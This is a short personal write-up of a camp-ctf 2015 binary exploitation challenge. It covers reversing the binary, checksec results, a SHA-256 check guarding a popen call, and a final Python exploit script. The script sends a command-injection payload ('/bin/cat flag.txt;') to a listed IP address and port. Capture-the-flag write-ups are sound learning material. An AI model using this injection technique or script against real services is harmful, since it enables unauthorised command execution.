This challenge is form camp-ctf 2015. This is the first time i have solved a real Binary Exploitation challenge. The given bianry is actually ELF 64-bit , dynamically linked and stripped. So i randomly gave large input and got segmentation fault at some point. So i though that must be some simple ROP and stared reversing it. I found some venerable functions like getline (Which doesn’t check the size of the input) and there was strcpy function called i was shocked “why the need of strcpy in the case you have getline”. So to check weather it is NX enabled or not, i used checksec for that.
RELRO STACK CANARY NX PIE RPATH RUNPATH
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH
So i was shocked seeing FULL RELRO and Canary found for which you cannot use normal ROP. So thought there must something other than the overflowing part and started reversing it again. I found one “POPEN” function from which could spawn a shell. But to call that function you have to pass a “STRCMP” function. But the comparison was with some hash value.
Later I figured it out it was SHA_256 encryption and it encrypting was 256 bytes. But i didn’t knew which 256 bytes was those. After some brute force i found those were first 256 bytes of the input and was comparing form 284th byte of the input. i tried giving input same as that and that worked, I could call POPEN with the argument as, starting from 257th byte of the input. Later i tried giving “/bin/sh\x00” as argument but that didn’t work because there is STRRCHR function in the beginning which i didn’t notice. That function was actually searching for null byte. So that didn’t work and i wasted lot of time trying with other stuff. Later one of my senior gave me an idea, which was command injunction(;) which i tried reading flag and that worked… 🙂
And here is my exploit.
import struct
import socket
ip = "144.76.92.167"
port = 10105
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
payload = ''
payload += "A" * 256
payload += "/bin/cat flag.txt;"
payload += "B" * 9
payload += "e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb" #This is the SHA_256 of 256 A's
soc.send(payload + '\n')
print soc.recv(1050)